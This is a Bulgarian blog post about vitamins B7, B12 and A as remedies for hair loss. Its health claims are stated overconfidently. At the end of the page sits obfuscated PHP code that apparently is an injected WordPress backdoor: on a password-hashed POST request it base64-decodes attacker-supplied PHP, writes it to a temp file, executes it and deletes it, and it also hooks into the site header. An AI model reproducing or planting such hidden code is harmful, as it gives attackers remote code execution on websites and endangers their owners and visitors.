Витамини при борба с косопада | Косопад

Топ 3 витамина срещу косопад

витамини и косопад

Витамини срещу косопад

Отдавна не е тайна, че витамините играят основна роля в борбата с косопад и оплешивяване. Въпреки това обаче твърде малко хора знаят, кои са основните вещества, отговарящи за доброто състояние на коса, от които тя става гъста, силна и блестяща. Разбира се, всички витамини са важни, но три от тях са от особено значение за липсата на косопад. Вижте кои са те.

В7

Това е един от най – популярните витамини, които със сигурност помагат при косопад. Известен е още под наименованията биотин и витамин Н, той е от решаващо значение за растежа на клетките, производството на мастни киселини и всички онези процеси, които карат косата да расте дълга, здрава и силна. В7 се набавя чрез храната и ако имаме нещастието на стартираме зле балансирана диета, може да се предизвика силен дефицит.

В12

Друг супер витамин от семейството на група В комплекс е В12. Той често се среща в животинските продукти като риба, месо, мляко, яйца. Почти винаги го добавят и към скъпите продукти за спортисти като енергийни напитки и вафли. Неговата популярност се дължи на благотворното му влияние върху кръвта и мускулатурата на цялото тяло. Липсата на В12 се усеща веднага и организма просто не е в състояние да работи без него, а косата също не е изключение. Недостигът на този витамин е една от основните причини за косопад и побеляване на космите.

Витамин A

Именно витамин А е този, който поддържа космените фоликули живи и кара скалпа да произвежда естествения овлажнител на косата – себум. Този безценен витамин е силно средство против косопад и прави косата здрава и лъскава. Намира се в почти всички плодове и зеленчуци, което само по себе си е чудесна причина да започнем да се храним здравословно.

витамини и косопад

Витамини борят косопад

31. май 2013 08:37:53 от Косопад
Категории: Любопитно за косопада | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}